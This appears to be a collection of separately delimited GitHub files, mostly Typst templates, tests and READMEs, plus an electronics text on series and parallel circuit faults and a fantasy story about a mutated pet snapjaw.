("LINEAR B SYLLABLE B068 RO2", "Lo", 0),
("LINEAR B SYLLABLE B066 TA2", "Lo", 0),
("LINEAR B SYLLABLE B087 TWE", "Lo", 0),
("LINEAR B SYLLABLE B091 TWO", "Lo", 0),
(),
(),
("LINEAR B SYMBOL B018", "Lo", 0),
("LINEAR B SYMBOL B019", "Lo", 0),
("LINEAR B SYMBOL B022", "Lo", 0),
("LINEAR B SYMBOL B034", "Lo", 0),
("LINEAR B SYMBOL B047", "Lo", 0),
("LINEAR B SYMBOL B049", "Lo", 0),
("LINEAR B SYMBOL B056", "Lo", 0),
("LINEAR B SYMBOL B063", "Lo", 0),
("LINEAR B SYMBOL B064", "Lo", 0),
("LINEAR B SYMBOL B079", "Lo", 0),
("LINEAR B SYMBOL B082", "Lo", 0),
("LINEAR B SYMBOL B083", "Lo", 0),
("LINEAR B SYMBOL B086", "Lo", 0),
("LINEAR B SYMBOL B089", "Lo", 0),
)
|
https://github.com/Pablo-Gonzalez-Calderon/apuntes-botanica | https://raw.githubusercontent.com/Pablo-Gonzalez-Calderon/apuntes-botanica/main/src/template.typ | typst | Other | #import "@preview/showybox:2.0.1": showybox
#let properties(body) = {
set heading(numbering: "1.")
set text(lang: "es", font: "Linux Libertine")
set par(justify: true)
show heading.where(level: 4, numbering: "1."): it => {
heading(level: 4, numbering: none, it.body.text)
}
set page(numbering: ("1"))
set enum(indent: 1.25em)
set list(indent: 1.25em)
body
}
#let title() = {
set document(title: "Apuntes de Botánica", author: "<NAME>")
set page(paper: "a7")
align(center)[
#block(spacing: 0pt, text(size: 2em, weight: 700, "Apuntes de Botánica"))
#block(spacing: 10pt, text(size: 1.5em, weight: 500, [AGL101 --- Sección 1 ]))
#text(size: 1.25em, "Semestre 2023-2")
#text(size: 1em, "<NAME>")
]
}
#let new-class(new-page: true, tema, date) = {
if new-page {
pagebreak()
}
counter(heading).update(0)
block(
spacing: 0pt,
grid(
column-gutter: 11pt,
columns: (2fr, 1fr),
align(
left,
text(size: 1.3em, weight: 700, tema)
),
v(2pt)+
align(
right,
emph(date)
)
)
)
block(spacing: .5em, line(length: 100%))
}
#let examplebox(..body) = showybox(
frame: (
body-color: yellow.lighten(85%),
title-color: yellow.lighten(90%),
border-color: yellow.darken(10%),
thickness: (left: 2pt),
radius: 0pt
),
title-style: (
color: black,
),
title: "Ejemplo / Caso",
..body
)
#let obsbox(..body) = showybox(
frame: (
body-color: blue.lighten(85%),
title-color: blue.lighten(90%),
border-color: blue.darken(10%),
thickness: (left: 2pt),
radius: 0pt
),
..body
)
#let gloss(size: 2cm, body) = showybox(
frame: (
body-color: luma(240),
border-color: luma(200),
thickness: (left: 2pt),
radius: 0pt
),
box(
height: size
)[
#align(center, text(size:1.2em, style: "italic", "Glosario"))
#columns(2, body)
]
)
#let figure-box(..body) = showybox(
frame: (
radius: 0pt,
),
shadow: (
color: black,
offset: 3pt
),
..body
) |
https://github.com/Myriad-Dreamin/typst.ts | https://raw.githubusercontent.com/Myriad-Dreamin/typst.ts/main/fuzzers/corpora/par/paragraph.typ | typst | Apache License 2.0 |
#let template(content) = {
set text(size: 14pt)
set par(justify: true, first-line-indent: 2em)
content
}
#show: template
#show raw: rect
#linebreak()
Compared with the representation theorem we originally wanted, the version proved here carries an extra condition: there must exist at least one relation $R in "Rel"_Σ (η_1, η_2)$ between $η_1$ and $η_2$. However, not every pair $η_1$ and $η_2$ has at least one relation between them. For example, consider an abstract type $α$ with the following operations:
$ c: alpha #h(5em) f: alpha arrow "Ans" $
Then different implementations can assign different values to $(f c) : "Ans"$, so a program that uses this abstract type can observe the difference between the two implementations! Requiring the two implementations to be connected by a logical relation is therefore both necessary and reasonable.

Although the unrestricted representation theorem does not hold, we can find many concrete examples to which the fundamental theorem of logical relations applies. If a signature $Σ$ contains no operations, then any two implementations $η_1$ and $η_2$ can be related: simply take $ρ(α) = η_1 (α) times η_2 (α)$. Since there are no operations, this means that no values of α can be distinguished from one another. More generally, if every operation has the form $A_1 arrow ... arrow A_n arrow α$, that is, if the operations in the signature give us no way to observe the abstract type, then we can likewise show that any two implementations are related, and hence that no two implementations can be distinguished.
```js
import { $typst } from '@myriaddreamin/typst.ts/dist/esm/contrib/snippet.mjs';
const mainContent = 'Hello, typst!';
console.log(await $typst.svg({ mainContent }));
```
Compared with the representation theorem we originally wanted, the version proved here carries an extra condition: there must exist at least one relation $R in "Rel"_Σ (η_1, η_2)$ between $η_1$ and $η_2$. However, not every pair $η_1$ and $η_2$ has at least one relation between them. For example, consider an abstract type $α$ with the following operations:
$ c: alpha #h(5em) f: alpha arrow "Ans" $
Then different implementations can assign different values to $(f c) : "Ans"$, so a program that uses this abstract type can observe the difference between the two implementations! Requiring the two implementations to be connected by a logical relation is therefore both necessary and reasonable.

Although the unrestricted representation theorem does not hold, we can find many concrete examples to which the fundamental theorem of logical relations applies. If a signature $Σ$ contains no operations, then any two implementations $η_1$ and $η_2$ can be related: simply take $ρ(α) = η_1 (α) times η_2 (α)$. Since there are no operations, this means that no values of α can be distinguished from one another. More generally, if every operation has the form $A_1 arrow ... arrow A_n arrow α$, that is, if the operations in the signature give us no way to observe the abstract type, then we can likewise show that any two implementations are related, and hence that no two implementations can be distinguished.
```js
import { $typst } from '@myriaddreamin/typst.ts/dist/esm/contrib/snippet.mjs';
const mainContent = 'Hello, typst!';
console.log(await $typst.svg({ mainContent }));
```
|
https://github.com/gvallinder/KTHThesis_Typst | https://raw.githubusercontent.com/gvallinder/KTHThesis_Typst/main/preface.typ | typst | MIT License | #pagebreak(to: "odd")
#heading(outlined: false, level: 1)[Preface]<preface>
The fonts used in this template are:
- Figtree, which is used for headings, headers and captions. You can download it at #link("https://fonts.google.com/specimen/Figtree")
- Georgia, which is used for body text. It is a serif font in a similar vein to Times New Roman, but designed for legibility on screens. It is included in Windows (and on Mac too, I think), so no need for any installation there.
- STIX Two Math, which is used for the math environment. This is used by IEEE in their templates and is available though the STIX project at #link("https://github.com/stipub/stixfonts/releases").
You can find references and tutorials for Typst in their web app #link("https://typst.app/") or on their GitHub page #link("https://github.com/typst/typst")
#v(3em)
#block[Stockholm, 2024 \ _<NAME>_] |
https://github.com/Myriad-Dreamin/typst.ts | https://raw.githubusercontent.com/Myriad-Dreamin/typst.ts/main/fuzzers/corpora/text/hyphenate_00.typ | typst | Apache License 2.0 |
#import "/contrib/templates/std-tests/preset.typ": *
#show: test-page
// Test hyphenating english and greek.
#set text(hyphenate: true)
#set page(width: auto)
#grid(
columns: (50pt, 50pt),
[Warm welcomes to Typst.],
text(lang: "el")[διαμερίσματα. \ λατρευτός],
)
|
https://github.com/PabloRuizCuevas/numty | https://raw.githubusercontent.com/PabloRuizCuevas/numty/master/README.md | markdown | MIT License | ## Numty
### Numeric Typst
A library for performing mathematical operations on matrices, vectors/arrays, and numbers in Typst, with support for broadcasting and handling NaN values. Numty’s broadcasting rules and API are inspired by NumPy.
```typ
#import "numty.typ" as nt
// Define vectors and matrices
#let a = (1, 2, 3)
#let b = 2
#let m = ((1, 2), (1, 3))
// Element-wise operations with broadcasting
#nt.mult(a, b) // Multiply vector 'a' by scalar 'b': (2, 4, 6)
#nt.add(a, a) // Add two vectors: (2, 4, 6)
#nt.add(2, a) // Add scalar '2' to each element of vector 'a': (3, 4, 5)
#nt.add(m, 1) // Add scalar '1' to each element of matrix 'm': ((2, 3), (2, 4))
// Dot product of vectors
#nt.dot(a, a) // Dot product of vector 'a' with itself: 14
// Handling NaN cases in mathematical functions
#calc.sin((3, 4)) // Fails, as Typst does not support vector operations directly
#nt.sin((3, 4)) // Sine of each element in the vector: (0.1411, -0.7568)
// Generate equally spaced values and apply functions
#let x = nt.linspace(0, 10, 3) // Generate 3 equally spaced values between 0 and 10: (0, 5, 10)
#let y = nt.sin(x) // Apply sine function to each element: (0, -0.95, -0.54)
// Logical operations
#nt.eq(a, b) // Compare each element in 'a' to 'b': (false, true, false)
#nt.any(nt.eq(a, b)) // Check if any element in 'a' equals 'b': true
#nt.all(nt.eq(a, b)) // Check if all elements in 'a' equal 'b': false
// Handling special cases like division by zero
#nt.div((1, 3), (2, 0)) // Element-wise division, with NaN for division by zero: (0.5, float.nan)
// Matrix operations (element-wise)
#nt.add(m, 1) // Add scalar to matrix elements: ((2, 3), (2, 4))
```
## Supported Features:
### Logic Operations:
```typ
#import "numty.typ" as nt
#let a = (1,2,3)
#let b = 2
#nt.eq(a,b) // (false, true, false)
#nt.all(nt.eq(a,b)) // false
#nt.any(nt.eq(a,b)) // true
```
### Math operators:
All operators are element-wise; traditional matrix multiplication is not yet supported.
```typ
#nt.add((0,1,3), 1) // (1,2,4)
#nt.mult((1,3),(2,2)) // (2,6)
#nt.div((1,3), (2,0)) // (0.5,float.nan)
```
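For readers coming from NumPy, the element-wise semantics with scalar broadcasting that numty provides can be sketched in plain Python. This is only an illustrative model of the broadcasting rules, not numty's actual implementation:

```python
def broadcast(op, a, b):
    # Apply op element-wise; a scalar is broadcast against a vector,
    # mirroring numty/NumPy-style rules (flat vectors only, for brevity).
    a_vec = isinstance(a, (list, tuple))
    b_vec = isinstance(b, (list, tuple))
    if a_vec and b_vec:
        if len(a) != len(b):
            raise ValueError("shape mismatch")
        return [op(x, y) for x, y in zip(a, b)]
    if a_vec:
        return [op(x, b) for x in a]
    if b_vec:
        return [op(a, y) for y in b]
    return op(a, b)

add = lambda x, y: x + y
mult = lambda x, y: x * y

print(broadcast(add, (0, 1, 3), 1))         # [1, 2, 4]
print(broadcast(mult, (1, 3), (2, 2)))      # [2, 6]
```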
### Algebra with Nan handling:
```typ
#nt.log((0,1,3)) // (float.nan, 0 , 0.47...)
#nt.sin((1,3)) // (0.84.. , 0.14...)
```
### Vector operations:
Basic vector operations
```typ
#nt.dot((1,2),(2,4)) // 9
#nt.normalize((1,4), l:1) // (1/5,4/5)
```
### Others:
Functions for creating equally spaced values in linear and log space, useful for log plots
```typ
#nt.linspace(0,10,3) // (0,5,10)
#nt.logspace(1,3,3) // (10, 100, 1000)
#nt.geomspace(1,3,3) // (1, 1.732.., 3)
```
### Printing
```typ
#nt.print((1,2),(4,2)) // to display in the pdf
```
|
https://github.com/typst-community/valkyrie | https://raw.githubusercontent.com/typst-community/valkyrie/main/tests/types/content/test.typ | typst | Other | #import "/src/lib.typ" as z
#set page(height: 1cm, width: 1cm)
#{
_ = z.parse([123465], z.content())
}
|
https://github.com/Az-21/typst-components | https://raw.githubusercontent.com/Az-21/typst-components/main/components/boxed_link.typ | typst | Creative Commons Zero v1.0 Universal | #let boxed_link(url, background: rgb("#d2e7f0"), foreground: rgb("#000000"), size: 10pt, width: 100%) = block(
width: width,
fill: background,
inset: (x: 3pt, y: 0pt),
outset: (y: 12pt),
radius: 2pt,
)[
#align(center,
text(fill: foreground, size: size, link(url))
)
]
|
https://github.com/MALossov/YunMo_Doc | https://raw.githubusercontent.com/MALossov/YunMo_Doc/main/contents/info.typ | typst | Apache License 2.0 | #let ReportTitle = "云MO监控"
#let Authors = () |
https://github.com/RaphGL/ElectronicsFromBasics | https://raw.githubusercontent.com/RaphGL/ElectronicsFromBasics/main/DC/chap5/7_component_failure_analysis.typ | typst | Other | #import "../../core/core.typ"
=== Component failure analysis
The job of a technician frequently entails \"troubleshooting\" (locating
and correcting a problem) in malfunctioning circuits. Good
troubleshooting is a demanding and rewarding effort, requiring a
thorough understanding of the basic concepts, the ability to formulate
hypotheses (proposed explanations of an effect), the ability to judge
the value of different hypotheses based on their probability (how likely
one particular cause may be over another), and a sense of creativity in
applying a solution to rectify the problem. While it is possible to
distill these skills into a scientific methodology, most practiced
troubleshooters would agree that troubleshooting involves a touch of
art, and that it can take years of experience to fully develop this art.
An essential skill to have is a ready and intuitive understanding of how
component faults affect circuits in different configurations. We will
explore some of the effects of component faults in both series and
parallel circuits here, then to a greater degree at the end of the
\"Series-Parallel Combination Circuits\" chapter.
Let\'s start with a simple series circuit:
#image("static/00098.png")
With all components in this circuit functioning at their proper values,
we can mathematically determine all currents and voltage drops:
#image("static/10089.png")
Now let us suppose that R#sub[2] fails shorted. #emph[Shorted] means
that the resistor now acts like a straight piece of wire, with little or
no resistance. The circuit will behave as though a \"jumper\" wire were
connected across R#sub[2] (in case you were wondering, \"jumper wire\"
is a common term for a temporary wire connection in a circuit). What
causes the shorted condition of R#sub[2] is no matter to us in this
example; we only care about its effect upon the circuit:
#image("static/00099.png")
With R#sub[2] shorted, either by a jumper wire or by an internal
resistor failure, the total circuit resistance will #emph[decrease].
Since the voltage output by the battery is a constant (at least in our
ideal simulation here), a decrease in total circuit resistance means
that total circuit current #emph[must increase]:
#image("static/10090.png")
As the circuit current increases from 20 milliamps to 60 milliamps, the
voltage drops across R#sub[1] and R#sub[3] (which haven\'t changed
resistances) increase as well, so that the two resistors are dropping
the whole 9 volts. R#sub[2], being bypassed by the very low resistance
of the jumper wire, is effectively eliminated from the circuit, the
resistance from one lead to the other having been reduced to zero. Thus,
the voltage drop across R#sub[2], even with the increased total current,
is zero volts.
On the other hand, if R#sub[2] were to fail \"open\" -- resistance
increasing to nearly infinite levels -- it would also create
wide-reaching effects in the rest of the circuit:
#image("static/00100.png")
#image("static/10091.png")
With R#sub[2] at infinite resistance and total resistance being the sum
of all individual resistances in a series circuit, the total current
decreases to zero. With zero circuit current, there is no electron flow
to produce voltage drops across R#sub[1] or R#sub[3]. R#sub[2], on the
other hand, will manifest the full supply voltage across its terminals.
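The before/after arithmetic above is easy to script. The sketch below assumes a 9-volt source with R1 = 100 Ω, R2 = 300 Ω, and R3 = 50 Ω (the figures carry the actual component values; these are merely chosen so that the healthy current is the 20 milliamps described), and models a short as 0 Ω and an open as infinite resistance:

```python
def series_analysis(supply, resistors):
    # Returns (current, voltage drops) for a series circuit.
    # A shorted component is 0 ohms; an open one is float('inf').
    if any(r == float('inf') for r in resistors):
        # An open breaks the loop: no current flows, and the (single)
        # open component manifests the full supply voltage.
        current = 0.0
        drops = [supply if r == float('inf') else 0.0 for r in resistors]
    else:
        current = supply / sum(resistors)
        drops = [current * r for r in resistors]
    return current, drops

E = 9.0
R1, R2, R3 = 100.0, 300.0, 50.0               # assumed example values

print(series_analysis(E, [R1, R2, R3]))            # healthy: 20 mA
print(series_analysis(E, [R1, 0.0, R3]))           # R2 shorted: 60 mA, 0 V on R2
print(series_analysis(E, [R1, float('inf'), R3]))  # R2 open: 0 A, 9 V on R2
```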
We can apply the same before/after analysis technique to parallel
circuits as well. First, we determine what a \"healthy\" parallel
circuit should behave like.
#image("static/00101.png")
#image("static/10092.png")
Supposing that R#sub[2] opens in this parallel circuit, here\'s what the
effects will be:
#image("static/00102.png")
#image("static/10093.png")
Notice that in this parallel circuit, an open branch only affects the
current through that branch and the circuit\'s total current. Total
voltage -- being shared equally across all components in a parallel
circuit -- will be the same for all resistors. Due to the fact that the
voltage source\'s tendency is to hold voltage #emph[constant], its
voltage will not change, and being in parallel with all the resistors,
it will hold all the resistors\' voltages the same as they were before:
9 volts. Being that voltage is the only common parameter in a parallel
circuit, and the other resistors haven\'t changed resistance value,
their respective branch currents remain unchanged.
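In an ideal parallel circuit this is again simple arithmetic. The branch resistances below are assumed purely for illustration (the figures carry the actual values); the point is that opening one branch zeroes only that branch's current and the total:

```python
def parallel_currents(supply, resistors):
    # Branch currents and total current in an ideal parallel circuit;
    # an open branch (float('inf')) simply carries no current.
    branch = [0.0 if r == float('inf') else supply / r for r in resistors]
    return branch, sum(branch)

E = 9.0
R1, R2, R3 = 90.0, 45.0, 180.0                # assumed example values

print(parallel_currents(E, [R1, R2, R3]))            # branches unchanged, total 0.35 A
print(parallel_currents(E, [R1, float('inf'), R3]))  # R2 open: only its branch and
                                                     # the total are affected
```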
This is what happens in a household lamp circuit: all lamps get their
operating voltage from power wiring arranged in a parallel fashion.
Turning one lamp on and off (one branch in that parallel circuit closing
and opening) doesn\'t affect the operation of other lamps in the room,
only the current in that one lamp (branch circuit) and the total current
powering all the lamps in the room:
#image("static/00357.png")
In an ideal case (with perfect voltage sources and zero-resistance
connecting wire), shorted resistors in a simple parallel circuit will
also have no effect on what\'s happening in other branches of the
circuit. In real life, the effect is not quite the same, and we\'ll see
why in the following example:
#image("static/00103.png")
#image("static/10094.png")
A shorted resistor (resistance of 0 Ω) would theoretically draw infinite
current from any finite source of voltage (I\=E/0). In this case, the
zero resistance of R#sub[2] decreases the circuit total resistance to
zero Ω as well, increasing total current to a value of infinity. As long
as the voltage source holds steady at 9 volts, however, the other branch
currents (I#sub[R1] and I#sub[R3]) will remain unchanged.
The critical assumption in this \"perfect\" scheme, however, is that the
voltage supply will hold steady at its rated voltage while supplying an
infinite amount of current to a short-circuit load. This is simply not
realistic. Even if the short has a small amount of resistance (as
opposed to absolutely zero resistance), no #emph[real] voltage source
could arbitrarily supply a huge overload current and maintain steady
voltage at the same time. This is primarily due to the internal
resistance intrinsic to all electrical power sources, stemming from the
inescapable physical properties of the materials they\'re constructed
of:
#image("static/00104.png")
These internal resistances, small as they may be, turn our simple
parallel circuit into a series-parallel combination circuit. Usually,
the internal resistances of voltage sources are low enough that they can
be safely ignored, but when high currents resulting from shorted
components are encountered, their effects become very noticeable. In
this case, a shorted R#sub[2] would result in almost all the voltage
being dropped across the internal resistance of the battery, with almost
no voltage left over for resistors R#sub[1], R#sub[2], and R#sub[3]:
#image("static/00105.png")
#image("static/10095.png")
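The voltage collapse can also be sketched numerically. The internal resistance and branch resistances below are assumptions for illustration; the behaviour, not the exact numbers, is the point:

```python
def terminal_voltage(emf, r_internal, branches):
    # Terminal voltage of a source with internal resistance driving
    # parallel branches (a voltage divider between R_internal and the load).
    conductance = sum(1.0 / r for r in branches)
    r_load = 1.0 / conductance
    return emf * r_load / (r_internal + r_load)

E, R_int = 9.0, 0.2                        # assumed small internal resistance
healthy = [90.0, 45.0, 180.0]              # assumed branch resistances
faulted = [90.0, 0.001, 180.0]             # R2 shorted (near-zero ohms)

print(terminal_voltage(E, R_int, healthy))  # barely below the 9 V EMF
print(terminal_voltage(E, R_int, faulted))  # collapses toward zero: almost all
                                            # voltage is dropped across R_internal
```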
Suffice it to say, intentional direct short-circuits across the
terminals of any voltage source is a bad idea. Even if the resulting
high current (heat, flashes, sparks) causes no harm to people nearby,
the voltage source will likely sustain damage, unless it has been
specifically designed to handle short-circuits, which most voltage
sources are not.
Eventually in this book I will lead you through the analysis of circuits
#emph[without the use of any numbers], that is, analyzing the effects of
component failure in a circuit without knowing exactly how many volts
the battery produces, how many ohms of resistance is in each resistor,
etc. This section serves as an introductory step to that kind of
analysis.
Whereas the normal application of Ohm\'s Law and the rules of series and
parallel circuits is performed with numerical quantities
(#emph[\"quantitative\"]), this new kind of analysis without precise
numerical figures is something I like to call #emph[qualitative]
analysis. In other words, we will be analyzing the #emph[qualities] of
the effects in a circuit rather than the precise #emph[quantities]. The
result, for you, will be a much deeper intuitive understanding of
electric circuit operation.
#core.review[
- To determine what would happen in a circuit if a component fails,
re-draw that circuit with the equivalent resistance of the failed
component in place and re-calculate all values.
- The ability to intuitively determine what will happen to a circuit
with any given component fault is a #emph[crucial] skill for any
electronics troubleshooter to develop. The best way to learn is to
experiment with circuit calculations and real-life circuits, paying
close attention to what changes with a fault, what remains the same,
and #emph[why]!
- A #emph[shorted] component is one whose resistance has dramatically
decreased.
- An #emph[open] component is one whose resistance has dramatically
increased. For the record, resistors tend to fail open more often than
fail shorted, and they almost never fail unless physically or
electrically overstressed (physically abused or overheated).
]
|
https://github.com/el-ev/simple-assignment-template | https://raw.githubusercontent.com/el-ev/simple-assignment-template/main/template.typ | typst | MIT License | #let justify_align(left_body, right_body) = {
block[
#box(width: 1fr)[
#align(left)[
#left_body
]
]
#box(width: 1fr)[
#align(right)[
#right_body
]
]
]
}
#let box(contents) = {
rect(
fill: rgb(242,242,242),
stroke: 0pt,
width: 100%,
align(left)[#contents]
)
}
#let simple_answer(question, term) = {
[=== #question]
box(term)
}
#let answer(question, numbering_fmt: "a", ..answers) = {
[=== #question]
let length = answers.pos().len()
for i in range(0, length) {
let answer = answers.pos().at(i)
let question_number = numbering(numbering_fmt, i+1)
[==== #question_number]
box(answer)
}
}
#let init(title, author, student_number: none, body) = {
set document(title: title, author: author)
set page(
paper: "a4",
margin: (left: 10mm, right: 10mm, top: 10mm, bottom: 10mm),
footer: [
#set text(fill: gray, size: 8pt)
#justify_align[
#smallcaps[#datetime.today().display("Compiled at [year]-[month]-[day]")]
][
#counter(page).display()
]
],
footer-descent: 0pt,
)
set text(font: "PingFang SC")
align(top + left)[Name: #author]
if student_number != none {
align(top + left)[Student ID: #student_number]
}
align(center)[= #title]
body
} |
https://github.com/jackkyyh/ZXCSS | https://raw.githubusercontent.com/jackkyyh/ZXCSS/main/import.typ | typst | #import "@preview/polylux:0.3.1": *
#import "@preview/physica:0.8.1":bra, ket
#import "@preview/tablex:0.0.6": tablex, hlinex, vlinex, cellx
#import "@preview/xarrow:0.2.0": xarrow
// #import "@preview/commute:0.2.0": node, arr, commutative-diagram
#import themes.metropolis: *
#let write_footer(footer) = {m-footer.update[#text(size: 14pt)[#footer]]}
#let reset_footer() = {m-footer.update([])}
#let eqt(sup, sub: none) = math.attach(math.limits(xarrow(sym: sym.eq, text(0.7em)[#sup])), b: text(0.7em)[#sub])
#let cbox = box.with(stroke: 2pt + gray, inset: 15pt, radius: 10pt)
#let all_table = tablex(columns: (6em, 1fr, 1fr, 1fr, 1fr, 1fr, 1fr), rows: (1fr), align: horizon+center,
auto-lines: false,
(), vlinex(stroke: 2.5pt), vlinex(), vlinex(),vlinex(), vlinex(), vlinex(),
[],[square],[Steane],[$[| 5, 1, 3 |]$],[cubic],[QRM],[$[| 10, 1, 2 |]$],
hlinex(stroke: 2.5pt),
[stab. group],[],[],[],[],[],[],
hlinex(start: 0, end: 1),
[geometry],[],[],[],[],[],[],
hlinex(start: 0, end: 1),
[tanner graph],[],[],[],[],[],[],
hlinex(start: 0, end: 1),
[circuit],[],[],[],[],[],[],
)
#let stean_reprs = [
#place(dx: 10pt, dy: 10pt)[$X_1 X_3 X_5 X_7$\ $X_2 X_3 X_6 X_7$\ $ dots.v $]
#place(dx: 150pt, dy: 30pt)[#image("./figs/steane/geo.svg", width: 6cm)]
#place(dx: 350pt, dy: 30pt)[#image("./figs/steane/tanner.png", width: 6cm)]
#place(dx: 580pt, dy: -60pt)[#image("./figs/steane/circ.png", width: 6cm)]
]
#let stean_arrows = [
#place(dx: 10cm, dy: -6.5cm)[
$[| 7, 1, 3 |]$\ Steane code]
#place(dx: 90pt, dy: -80pt)[#rotate(-40deg)[#xarrow(sym: sym.arrow.l, margin: 25pt, [stabilizer group])]]
#place(dx: 220pt, dy: -60pt)[#rotate(-70deg)[#xarrow(sym: sym.arrow.l, margin: 25pt, [geometry])]]
#place(dx: 330pt, dy: -60pt)[#rotate(70deg)[#xarrow(sym: sym.arrow, margin: 20pt, [tanner graph])]]
#place(dx: 450pt, dy: -90pt)[#rotate(30deg)[#xarrow(sym: sym.arrow, margin: 25pt, [encoder])]]
] |
|
https://github.com/jgm/typst-hs | https://raw.githubusercontent.com/jgm/typst-hs/main/test/typ/compiler/ops-03.typ | typst | Other | // Subtraction.
#test(1-4, 3*-1)
#test(4cm - 2cm, 2cm)
#test(1e+2-1e-2, 99.99)
// Multiplication.
#test(2 * 4, 8)
// Division.
#test(12pt/.4, 30pt)
#test(7 / 2, 3.5)
// Combination.
#test(3-4 * 5 < -10, true)
#test({ let x; x = 1 + 4*5 >= 21 and { x = "a"; x + "b" == "ab" }; x }, true)
// With block.
#test(if true {
1
} + 2, 3)
// Mathematical identities.
#let nums = (
1, 3.14,
12pt, 3em, 12pt + 3em,
45deg,
90%,
13% + 10pt, 5% + 1em + 3pt,
2.3fr,
)
#for v in nums {
// Test plus and minus.
test(v + v - v, v)
test(v - v - v, -v)
// Test plus/minus and multiplication.
test(v - v, 0 * v)
test(v + v, 2 * v)
// Integer addition does not give a float.
if type(v) != "integer" {
test(v + v, 2.0 * v)
}
if "relative" not in type(v) and ("pt" not in repr(v) or "em" not in repr(v)) {
test(v / v, 1.0)
}
}
// Make sure length, ratio and relative length
// - can all be added to / subtracted from each other,
// - multiplied with integers and floats,
// - divided by integers and floats.
#let dims = (10pt, 1em, 10pt + 1em, 30%, 50% + 3cm, 40% + 2em + 1cm)
#for a in dims {
for b in dims {
test(type(a + b), type(a - b))
}
for b in (7, 3.14) {
test(type(a * b), type(a))
test(type(b * a), type(a))
test(type(a / b), type(a))
}
}
// Test division of different numeric types with zero components.
#for a in (0pt, 0em, 0%) {
for b in (10pt, 10em, 10%) {
test((2 * b) / b, 2)
test((a + b * 2) / b, 2)
test(b / (b * 2 + a), 0.5)
}
}
|
https://github.com/polarkac/MTG-Stories | https://raw.githubusercontent.com/polarkac/MTG-Stories/master/stories/004%20-%20Dragon's%20Maze/010_Paper%20Trail.typ | typst | #import "@local/mtgstory:0.2.0": conf
#show: doc => conf(
"Paper Trail",
set_name: "Dragon's Maze",
story_date: datetime(day: 12, month: 06, year: 2013),
author: "<NAME>",
doc
)
#box(inset: (left: 2.0mm), stroke: (left: 0.5mm + gray))[Diary,
Today is the best day ever! Mama bought me a snapjaw egg at the market! I promised to take good care of it and clean up after it and make sure that it doesn’t eat anything important. Snapjaws are the best pets! Lev had one, and nobody messed with him after that. We’re going to be best friends.
Ruslan]
#box(inset: (left: 2.0mm), stroke: (left: 0.5mm + gray))[Diary,
Today, Kuba is three weeks old. He’s gotten so big! Mama likes him because he eats the rats, but he eats pretty much anything we let him. He follows me everywhere and he’s super nice. I feed him what’s left over from my lunch and he licks my face. Alena’s mad at me because she says Kuba ate her dog, but I know he didn’t and anyway her stupid dog bit me yesterday so it would serve her right.
Ruslan]
#box(inset: (left: 2.0mm), stroke: (left: 0.5mm + gray))[Diary,
Kuba ran away. He chased something into the sewers and didn’t come back. Mama says I can get another one, but I don’t want another one. I want Kuba to come home.
Ruslan]
#figure(image("010_Paper Trail/02.jpg", width: 100%), caption: [], supplement: none, numbering: none)
#strong[12 Griev, Drudge-Monitor’s Log]
Sewage reclamation proceeding without incident. Three workers cycled during the past week, and two have returned. No net loss of efficiency in our sector.
A snapjaw made its way into the rot farm today, presumably from Above. It’s been fighting and eating nonstop since its arrival. A couple of us have taken bets on how long it will live.
#strong[19 Griev, Drudge-Monitor’s Log]
The snapjaw has gotten out of hand. It ate two of the workers, so we brought in a handler to put it to better purpose. Then it ate the handler. While I’m sure with sufficient effort we could put the beast to good use, I don’t believe it’s worth the effort and losses. I’m planning on having it herded through an outflow grate into Izzet League territory. Let it eat some of them. We’ve got real work to do.
#figure(image("010_Paper Trail/04.jpg", width: 100%), caption: [], supplement: none, numbering: none)
#strong[Trial Proposal #1547, <NAME>, Mechanoaugmentation Specialist, Third Class]
Background: Implementation of biomechanical augmentation systems has been historically hampered as the mental faculties of the implanted organism lack the instinctive neural pathways to handle the sudden integration of the new devices.
Question: Can a neuroamplification serum be applied to a subject in concert with an implanted mechanical augmentation in order to give the subject the ability to integrate the augmentation into its instinctive biological processes?
Methods: Implant a simple mizzium mechanical augmentation framework into a biological organism in concert with neuroamplification serum (formula \#R-25J12) to determine if the biological organism will exert mental control over the framework without destroying either the organism or the framework.
Safety Protocols: Impact projected to be minimal. Low-security bioenclosure requested.
#figure(image("010_Paper Trail/06.jpg", width: 100%), caption: [], supplement: none, numbering: none)
Speaker Trifon,
I am pleased to inform you of the results of a series of projects that have recently come to an end. As you have been notified, several weeks ago, we discovered a badly injured creature wading along the Northern Interior coast. We coaxed it into incubation in order to heal it, and an unexpected set of reactions began.
While I posit that the creature began life as a common snapjaw, it has certainly had an eventful life. Its enhanced size and musculature are consistent with creatures raised by the Golgari, while its reinforced skeletal system is clearly the result of malicious Izzet tinkering. We surgically excised most of those mechanisms, but could not remove all of them for fear of damaging its central nervous system.
I used a standard set of mixtures for the incubation chamber, but it seems that this snapjaw was destined for something greater than either its origin, or even I, had intended for it. It began to manifest incredible intellectual expansion, and whether through contamination, or, as I theorize, some sort of #emph[ideal internal] to its own nascent consciousness—it began to develop approximations of humanoid features. I believe that it is on the verge of demonstrating sapience. My enthusiasm over this accomplishment is diminished only by the fact that I have no idea how I would ever replicate it.
You will, of course, be kept apprised of the subject’s progress, although I intend for the subject’s life and choices to become increasingly self-directed over time.
Stanisil, Biomancer, <NAME>
#figure(image("010_Paper Trail/08.jpg", width: 100%), caption: [], supplement: none, numbering: none)
Stanisil has asked me to record my thoughts and feelings as I, and they, develop. I look at these #emph[hands] , and I do not fully recognize them as my own. I remember the idea of hands, and I remember what my forelimbs used to be. Neither of those things are what currently grip this quill. I am frequently asked what I #emph[want] , how I #emph[feel] , and I do not know what to say. The Simic have taken exceptional care of me, and they treat me with respect. But it is their curiosity that I feel more than anything else. I am being studied, and I do not like it.
I am told that I have the freedom to go where I wish, and do as I please. The idea terrifies me. Sometimes, I want nothing more than to find a warm place in the sun. Everything feels so new.
There is another thing that my mind keeps returning to, but I hesitate to share it, even with Stanisil. There is an image of a human boy. I remember his kindness. I remember being happy. I remember…
#emph[Home] .
I want to go home. And I think I remember the way.
|
|
https://github.com/LeeWooQM/TypstNote | https://raw.githubusercontent.com/LeeWooQM/TypstNote/main/README.md | markdown | MIT License | # Simple Note for Typst
This project uses the code of
https://github.com/Fr4nk1in-USTC/typst-notebook
### How to use it
- Copy temp.typ to your document's folder
- Add these lines at the top of your source file
```typst
#import "temp.typ": note
#import "temp.typ": theorem
#import "temp.typ": definition
#import "temp.typ": deduction
#import "temp.typ": proof
```
- Use the `note` function to set up your document
```typst
#show: doc => note(
title: "Note Title", //title
author: "Name",
mail: "<EMAIL>",
logo: none, //the logo displayed in the title page
preface: none, //preface
boxed_heading: false, //enable the custom heading style
)[ some things... ]
```
- Create different environments
